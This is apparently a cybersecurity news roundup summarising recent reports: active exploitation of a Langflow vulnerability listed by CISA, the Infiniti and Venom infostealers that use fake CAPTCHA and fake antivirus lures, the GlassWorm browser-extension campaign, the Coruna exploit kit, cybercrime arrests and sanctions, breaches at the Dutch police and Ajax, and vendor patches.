Originally reported by BleepingComputer, Graham Cluley, Cisco Talos, Malwarebytes Labs
TL;DR
CISA confirmed active exploitation of a critical Langflow AI framework vulnerability, prompting emergency patches. Meanwhile, new macOS infostealers are using fake CAPTCHA tricks and browser extensions are being weaponized for supply chain surveillance attacks.
CISA added CVE-2026-33017 affecting Langflow AI frameworks to their KEV catalog with confirmed active exploitation, making this critical severity despite other lower-impact stories in the roundup.
The Cybersecurity and Infrastructure Security Agency (CISA) issued an urgent warning that threat actors are actively exploiting CVE-2026-33017, a critical vulnerability in the Langflow framework used for building AI agents and workflows. The flaw allows attackers to hijack AI-powered applications and potentially access sensitive data processed by these systems. Organizations using Langflow should immediately apply available patches and review their AI infrastructure for signs of compromise.
Malwarebytes researchers discovered Infiniti Stealer (formerly NukeChain), a new macOS infostealer that leverages fake CAPTCHA pages to trick users into executing malicious commands. The malware uses Python/Nuitka compilation and employs ClickFix social engineering techniques to bypass macOS security controls. Once installed, it harvests credentials, browser data, and cryptocurrency wallet information from infected systems.
The GlassWorm attack campaign installs malicious browser extensions that masquerade as legitimate developer tools. According to Malwarebytes analysis, these extensions monitor web activity, steal authentication data, and create persistent surveillance capabilities that can spread across development environments. The attack demonstrates how browser-based threats can escalate into broader supply chain compromises.
Security researchers linked the Coruna exploit kit to the Operation Triangulation campaign that targeted iPhones in 2023 through zero-click iMessage exploits. The framework represents an evolution of nation-state-level iOS exploitation capabilities, suggesting continued development of advanced mobile attack vectors by sophisticated threat actors.
A fraudulent Avast website discovered by Malwarebytes conducts fake virus scans before installing Venom Stealer malware instead of providing legitimate security protection. The campaign targets users seeking antivirus software, delivering credential theft capabilities that harvest passwords, session tokens, and cryptocurrency wallet data.
Russian authorities arrested the suspected owner of LeakBase, a major cybercrime forum used for trading stolen data and hacking tools. Separately, the UK sanctioned Xinbi, a Chinese-language marketplace that supplies stolen data and satellite internet equipment to Southeast Asian scam operations. These actions represent coordinated efforts to disrupt cybercriminal supply chains.
The Dutch National Police disclosed a security breach following a successful phishing attack, though officials stated citizen data remained unaffected. Additionally, Ajax Football Club revealed that attackers exploited system vulnerabilities to access fan data and potentially hijack match tickets, affecting several hundred individuals.
Microsoft released KB5079391 for Windows 11, introducing Smart App Control improvements designed to better detect and block malicious applications. Cisco Talos disclosed 30 vulnerabilities across TP-Link, Canva, and HikVision products, all of which have been patched by their respective vendors.
Originally reported by BleepingComputer, Graham Cluley, Cisco Talos, Malwarebytes Labs